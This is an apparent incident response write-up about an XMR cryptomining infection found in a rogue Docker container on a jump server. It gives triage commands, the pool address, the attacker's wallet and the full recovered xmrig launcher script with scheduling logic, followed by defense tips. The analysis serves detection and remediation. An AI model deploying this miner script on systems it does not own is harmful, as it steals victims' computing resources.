Introduction

This incident response analysis details the discovery and handling of a Monero (XMR) cryptocurrency mining malware. The situation arose during a penetration test on the afternoon of the 26th, when elevated CPU usage (hitting 200%) was observed on a jump server. Promptly identified as XMR mining by a colleague, this spurred an interest in understanding and documenting the emergency response process, especially given that incident response is a developing area of expertise.

The proliferation of tutorials for XMR mining has unfortunately been exploited by malicious actors. These actors gain unauthorized access to servers through various illicit means and deploy XMR mining malware. To maintain persistence and profitability, they often establish backdoors via SSH public key implantation and configure scheduled tasks for automatic startup. This allows them to continuously utilize the compromised server's resources for mining operations.

The following sections outline the steps taken during the investigation and remediation.

A visual representation of the XMR mining malware's impact is provided below for context.

Initial Investigation

1. As seen in the performance monitor, CPU utilization spiked to 200%. A quick check using the top command revealed a process named xmrig, which is the key indicator that led to the identification of the XMR mining malware.

2. The command ps -aux | grep xmrig was used to inspect the running process and its associated command line arguments. The output showed:

   ./xmrig --coin=monero -o pool.supportxmr.com:3333 -u 89zqe5wQCDsML1xyYx7GxqDqR3DAizK6cXRsd7rXLLmyRCHaTFe6cDJA

   The parameters within the xmrig command are significant:

   • -o pool.supportxmr.com:3333: Specifies the mining pool address and port.
   • -u 89zqe5wQCDsML1xyYx7GxqDqR3DAizK6cXRsd7rXLLmyRCHaTFe6cDJA: Indicates the attacker's wallet address, where the mining proceeds are directed.

3. The executable associated with the process was identified using ls -l /proc/[PID]/exe, where [PID] represents the process ID (e.g., 643961).

4. Files opened by the process were examined with lsof -p [PID].

5. An attempt to terminate the process using kill -9 [PID] was made. However, the process re-emerged shortly after termination, suggesting the presence of a persistent mechanism, likely a scheduled task.

6. While initial checks for standard cron jobs yielded no results, further investigation revealed the issue originated from within a Docker container. An additional, unauthorized container was discovered.

   The container, identified as pmietlicki/monero-miner, is specifically designed for Monero mining and contains the necessary software and configurations to initiate mining operations rapidly.

7. Executing docker stop [container_id] halted the rogue container. Subsequently, the top command confirmed that CPU usage had returned to normal levels.

   The mining container image was then removed using Docker commands. Although a search for and deletion of xmrig files globally produced some errors, it did not impede the overall remediation process. The initial phase of the mining malware incident response was concluded.

Malware Sample Analysis

A global search using find / -name xmrig was performed to locate the malware's storage directory. The malicious sample was discovered and subsequently downloaded locally for deeper analysis.

Examination of the directory's contents revealed a collection of files related to the malware. The analysis of subdirectories and files within this directory provided the following insights:

#!/bin/bash
algoMode=$1
poolUrl=$2
poolUser=$3
poolPW=$4
maxCpu=$5
useScheduler=$6 # true / false
startTime=$7 #e.g. 1530 or 1100 for time
stopTime=$8 #e.g. 1530 or 1100 for time
days=$9 #e.g. "Tuesday,Friday"
options=${10}
miner="./xmrig"
if [ "$maxCpu" != "100" ] && [ "$maxCpu" != "50" ] && [ "$maxCpu" != "25" ] && [ "$maxCpu" != "12.5" ] && [ "$maxCpu" != "6.25" ] ; then
    echo "maxCpu is not valid"; exit;
fi;
if [ "$useScheduler" != "true" ] && [ "$useScheduler" != "false" ]; then
    echo "useScheduler is not valid, use true or false"; exit;
fi;
if ! [[ ${poolUrl} =~ .+\.[a-z]+\:[0-9]+ ]]; then
    echo "The URL Format seams not right."; exit;
fi;
if [ "$useScheduler" == "true" ]; then
        if [ ${#startTime} -ne 4 ]; then
                echo "startTime is not in a valid format"; exit;
        fi;
        if [[ ${startTime} =~ [A-Za-z_\;\:\.]+ ]]; then
            echo "startTime can only contain digits"; exit;
        fi;
        if [ ${#stopTime} -ne 4 ]; then
                echo "stopTime is not in a valid fromat"; exit;
        fi;
        if [[ ${stopTime} =~ [A-Za-z_\;\:\.]+ ]]; then
            echo "stoptimeTime can only contain digits"; exit;
        fi;
        IFS=',' read -r -a dayArray <<< "$days"
        for day in "${dayArray[@]}"
    do
        if [ "${day,,}" != "monday" ] && [ "${day,,}" != "tuesday" ] && [ "${day,,}" != "wednesday" ] && [ "${day,,}" != "thursday" ] && [ "${day,,}" != "friday" ] && [ "${day,,}" != "saturday" ]  && [ "${day,,}" != "sunday" ]; then
                echo "Days are not formated correctley."; exit;
        fi;
    done
        # wait for starttime
        echo "================================================================";
        echo "Cryptonote mining container based on xmrig";
        echo "with task scheduling mod by MasterRoshi";
        echo  "";
        echo "Scheduler information";
        echo "At: $startTime - $stopTime GMT+0";
        echo "On: $days";
        echo "================================================================";
        echo "Waiting for the next work schedule....";
        while { printf -v current_day '%(%A)T' -1 && [[ ${days,,} != *"${current_day,,}"* ]]; } || { printf -v current_time '%(%H%M)T' -1 && [[ ${current_time} != ${startTime} ]]; }; do
                sleep 10;
        done;
        echo "Time to work, miner is signing-on!";
        # run xmrig as background
        $miner --coin="$algoMode" -o "$poolUrl" -u "$poolUser" -p "$poolPW" --max-cpu-usage="$maxCpu" "${options:---donate-level=3 -k}" &
        while printf -v current_time '%(%H%M)T' -1 && [[ $current_time != $stopTime ]]; do
                sleep 10;
        done;
        # end the xmring when the stoptime is reached
        pkill xmrig;
        echo "Miner signing-off and preparing for  the next work schedule!";
        "$0" "$algoMode" "$poolUrl" "$poolUser" "$poolPW" "$maxCpu" "$useScheduler" "$startTime" "$stopTime" "$days" "${options:---donate-level=3 -k}";
        exit;
else
         $miner --coin="$algoMode" -o "$poolUrl" -u "$poolUser" -p "$poolPW" --max-cpu-usage="$maxCpu" "${options:---donate-level=3 -k}";
fi;

Analysis of this script reveals it to be a cryptocurrency mining script based on xmrig, designed for execution on Linux systems. Key parameters include:

• algoMode: The cryptocurrency algorithm to mine.
• poolUrl: The URL of the mining pool.
• poolUser: The username for the miner.
• poolPW: The password for the miner.
• maxCpu: The maximum CPU percentage the miner will utilize.
• useScheduler: A boolean flag (true/false) to enable task scheduling.
• startTime: If scheduling is enabled, the start time in 24-hour format (e.g., 1530).
• stopTime: If scheduling is enabled, the stop time in 24-hour format (e.g., 1100).
• days: If scheduling is enabled, the specific days of the week for operation (e.g., "Tuesday,Friday").
• options: Additional xmrig parameters.

When useScheduler is set to true, the script waits for the defined start time and day before launching xmrig, and terminates the process at the specified stop time. If useScheduler is false, xmrig is launched immediately and runs continuously.

Remediation and Defense Recommendations

XMR mining malware is a type of malicious software that exploits the computational resources of infected computers to mine Monero (XMR) cryptocurrency without the user's explicit consent. The following measures are recommended for mitigating and defending against such threats:

1. Timely System Updates: Ensure operating systems, applications, and security patches are consistently updated to minimize exposure to known vulnerabilities.
2. Install Reputable Security Software: Deploy robust antivirus, anti-malware, and firewall solutions. Conduct regular full system scans and maintain real-time protection.
3. Exercise Caution with Software Downloads: Obtain software exclusively from official and trusted sources. Carefully review and approve any requested permissions during installation.
4. Strengthen Remote Access Security: Disable or restrict unnecessary remote access services (e.g., RDP). Implement strong passwords and multi-factor authentication for all remote access points.
5. Monitor System Activity: Actively monitor system logs, network traffic, and process behaviors to detect anomalies and unusual resource consumption patterns.
6. Prevent Unauthorized Mining Scripts: Utilize browser extensions or script-blocking tools (e.g., NoScript, AdBlock Plus) to prevent malicious websites from executing mining scripts in the browser.
7. Enhance Network Security: Enforce strong, regularly changed passwords. Implement network firewalls and restrict access to sensitive ports and services.
8. Regular Data Backups: Perform frequent backups of critical data and store them securely offline to safeguard against data loss or ransomware encryption.
9. Educate Users: Provide security awareness training to educate employees and users on identifying and avoiding malware threats.
10. Prompt Incident Response and Isolation: If an XMR mining malware infection is detected, immediately disconnect the affected system from the network and seek professional assistance for thorough cleanup and system restoration.

Disclaimer: While these measures significantly enhance system security, no security solution is entirely foolproof. Continuous vigilance and regular security assessments are crucial for maintaining the integrity of systems and data.